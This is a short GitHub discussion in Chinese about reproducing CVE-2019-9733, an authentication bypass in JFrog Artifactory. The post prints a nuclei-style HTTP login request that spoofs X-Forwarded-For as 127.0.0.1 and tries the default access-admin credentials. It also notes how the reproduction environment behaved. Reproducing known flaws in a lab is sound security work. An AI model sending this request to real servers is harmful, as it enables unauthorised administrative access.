Replies: 1 comment
-
|
1、该接口是登录接口,是允许输入账号密码进行登录。 |
Beta Was this translation helpful? Give feedback.
0 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
-
根据阿里云分析https://avd.aliyun.com/detail?id=AVD-2019-9733
与nuclei的poc分析
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, /
X-Requested-With: artUI
X-Forwarded-For: 127.0.0.1
Request-Agent: artifactoryUI
Content-Type: application/json
Origin: {{BaseURL}}
Referer: {{BaseURL}}/artifactory/webapp/
{"user":"access-admin","password":"password","type":"login"}
进行复现发现镜像里面的access-admin默认密码不是password,利用admin进行登陆然后修改access-admin发现不需要X-Forwarded-For: 127.0.0.1也能进行登陆
Beta Was this translation helpful? Give feedback.
All reactions